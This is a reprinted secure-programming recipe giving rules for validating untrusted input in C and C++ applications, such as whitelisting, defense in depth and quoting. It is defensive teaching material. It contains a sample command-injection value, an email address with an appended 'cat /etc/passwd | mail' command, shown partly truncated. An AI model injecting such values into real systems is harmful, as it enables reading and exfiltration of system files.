Editor's note: In this first in a three-part series of sample recipes from Secure Programming Cookbook for C and C++, the authors offer nine basic rules for proper data validation, which they recommend all programmers should follow. From their first rule: "Assume all input is guilty until proven otherwise" to their last: "The better you understand the data, the better you can filter it," the advice presented here will help programmers keep unwanted, malicious data out of their applications.
You have data coming into your application, and you would like to filter or reject data that might be malicious.
Perform data validation at all levels whenever possible. At the very least, make sure data is filtered on input.
Match constructs that are known to be valid and harmless. Reject anything else.
In addition, be sure to be skeptical about any data coming from a potentially insecure channel. In a client-server architecture, for example, even if you wrote the client, the server should never assume it is talking to a trusted client.
Applications should not trust any external input. We have often seen situations in which people had a custom client-server application and the application developer assumed that, because the client was written in house by trusted, strong coders, there was nothing to worry about in terms of malicious data being injected.
Those kinds of assumptions lead people to do things that turn out badly, such as embedding in a client SQL queries or shell commands that get sent to a server and executed. In such a scenario, an attacker who is good at reverse engineering can replace the SQL code in the client-side binary with malicious SQL code (perhaps code that reads private records or deletes important data). The attacker could also replace the actual client with a handcrafted client.
In many situations, an attacker who does not even have control over the client is nevertheless able to inject malicious data. For example, he might inject bogus data into the network stream. Cryptography can sometimes help, but even then, we have seen situations in which the attacker did not need to send data that decrypted properly to cause a problem--for example, as a buffer overflow in the portion of an application that does the decryption.
You can regard input validation as a kind of access control mechanism. For example, you will generally want to validate that the person on the other end of the connection has the right credentials to perform the operations that she is requesting. However, when you're doing data validation, most often you'll be worried about input that might do things that no user is supposed to be able to do.
For example, an access control mechanism might determine whether a user has the right to use your application to send email. If the user has that privilege, and your software calls out to the shell to send email (which is generally a bad idea), the user should not be able to manipulate the data in such a way that he can do anything other than send mail as intended.
Let's look at basic rules for proper data validation.
As we said earlier, you should never trust external input that comes from outside the trusted base. In addition, you should be very skeptical about which components of the system are trusted, even after you have authenticated the user on the other end!
If you determine that a piece of data might possibly be malicious, your best bet from a security perspective is to assume that using the data will screw you up royally no matter what you do, and act accordingly. In some environments, you might need to be able to handle arbitrary data, in which case you will need to treat all input in a way that ensures everything is benign. Avoid the latter situation if possible, because it is a lot harder to get right.
One of the most important principles in computer security, defense in depth, states that you should provide multiple defenses against a problem if a single defense may fail. This is important in input validation. You can check the validity of data as it comes in from the network, and you can check it right before you use the data in a manner that might possibly have security implications. However, each one of these techniques alone is somewhat error-prone.
When you're checking input at the points where data arrives, be aware that components might get ripped out and matched with code that does not do the proper checking, making the components less robust than they should be. More importantly, it is often very difficult to understand enough about the context of the data well enough to make validation easy when data is fresh from the network. That is, routines that read from a socket usually do not understand anything about the state the application is in. Without such knowledge, input routines can do only rudimentary filtering.
On the other hand, when you're checking input at the point before you use
it, it's often easy to forget to perform the check. Most of the time, you will
want to make life easier by producing your own wrapper API to do the
filtering, but sometimes you might forget to call it or end up calling it
improperly. For example, many people try to use
strncpy() to help prevent buffer overflows, but it is easy to use this function in the wrong way, as we discuss in Recipe 3.3.
Editor's note: Recipe 3.3, Input Validation in C and C++, was first published on our site as a "Beta Recipe" in May 2003. Now that the book is on store shelves we have updated the article so it reflects the final version of the recipe as you'll find it in the printed book.
Many data input problems involve the program's passing off data that came
from an untrusted source to some other entity that actually parses and acts
on the data. If the component doing the parsing has to trust its caller, bad
things can happen if your software does not do the proper checking. The best
known example of this is the Unix command shell. Sometimes, programs will
accomplish tasks by using functions such as
popen() that invoke a shell (which is often a bad
idea by itself; see Recipe 1.7). (We'll look at the shell input problem
later in this chapter.) Another popular example is the database query using
the SQL language. (We'll discuss input validation problems with SQL in
One obvious thing to do when using a command language such as the Unix shell or SQL is to construct commands in trusted software, instead of allowing users to send commands that get proxied. However, there is another "gotcha" here. Suppose that you provide users the ability to search a database for a word. When the user gives you that word, you may be inclined to concatenate it to your SQL command. If you do not validate the input, the user might be able to run other commands.
Consider what happens if you have a server application that, among other
things, can send email. Suppose that the email address comes from an untrusted
client. If the email address is placed into a buffer using a format string
/bin/mail %s < /tmp/email", what happens if the user submits the
following email address: "
email@example.com; cat /etc/passwd | mail
There are two different approaches to data filtering. With the first, known as whitelisting, you accept input as valid only if it meets specific criteria. Otherwise, you reject it. If you do this, the major thing you need to worry about is whether the rules that define your whitelist are actually correct!
With the other approach, known as blacklisting, you reject only those things that are known to be bad. It is much easier to get your policy wrong when you take this approach.
For example, if you really want to invoke a mail program by calling a shell, you might take a whitelist approach in which you allow only well-formed email addresses, as discussed in Recipe 3.9. Or you might use a slightly more liberal (less exact) whitelist policy in which you only allow letters, digits, the @ sign, and periods.
With a blacklist approach, you might try to block out every character that might be leveraged in an attack. It is hard to be sure that you are not missing something here, particularly if you try to consider every single operational environment in which your software may be deployed. For example, if calling out to a shell, you may find all the special characters for the bash shell and check for those, but leave people using tcsh (or something unusual) open to attack.
Sometimes, you really do need to be able to accept arbitrary data from an untrusted source and use that data in a security-critical way. For example, you might want to be able to put arbitrary contents from arbitrary documents into a database. In such a case, you might look for some kind of quoting mechanism. For example, you can usually stick untrusted data in single quotes in such an environment.
However, you need to be aware of ways in which an attacker can leave the quoted environment, and you must actively make sure that the attacker does not try to use them. For example, what happens if the attacker puts a single quote in the data? Will that end the quoting, allowing the rest of the attacker's data to do malicious things? If there are such escapes, you should check for them. In this particular example, you might be able to replace quotes in the attacker's data with a backslash followed by a quote.
Following from the previous point, if you need to filter data instead of rejecting potentially harmful data, it is useful to provide functions that properly quote an arbitrary piece of data for you. For example, you might have a function that quotes a string for a database, ensuring that the input will always be interpreted as a single string and nothing more. Such a function would put quotes around the string and additionally escape anything that could thwart the surrounding quotes (such as a nested quote).
Rough heuristics like "accept the following characters" do not always work well for data validation. Even if you filter out all bad characters, are the resulting combinations of benign characters a problem? For example, if you pass untrusted data through a shell, do you want to take the risk that an attacker might be able to ignore metacharacters but still do some damage by throwing in a well-placed shell keyword?
The best way to ensure that data is not bad is to do your very best to understand the data and the context in which that data will be used. Therefore, even if you're passing data on to some other component, if you need to trust the data before you send it, you should parse it as accurately as possible. Moreover, in situations where you cannot be accurate, at least be conservative, and assume that the data is malicious.
Recipe 1.7, Recipe 3.3, Recipe 3.9, and Recipe 3.11 of Secure Programming Cookbook for C and C++.
Check back here to this space next Tuesday (July 29) for a recipe from Secure Programming Cookbook for C and C++ on evaluating URL encodings.
Matt Messier is Director of Engineering at Secure Software, and coauthor of O'Reilly's "Network Security with OpenSSL."
John Viega is CTO of the SaaS Business Unit at McAfee and the author of many security books, including Building Secure Software (Addison-Wesley), Network Security with OpenSSL (O'Reilly), and the forthcoming Myths of Security (O'Reilly).
Return to the O'Reilly Network.
Copyright © 2009 O'Reilly Media, Inc.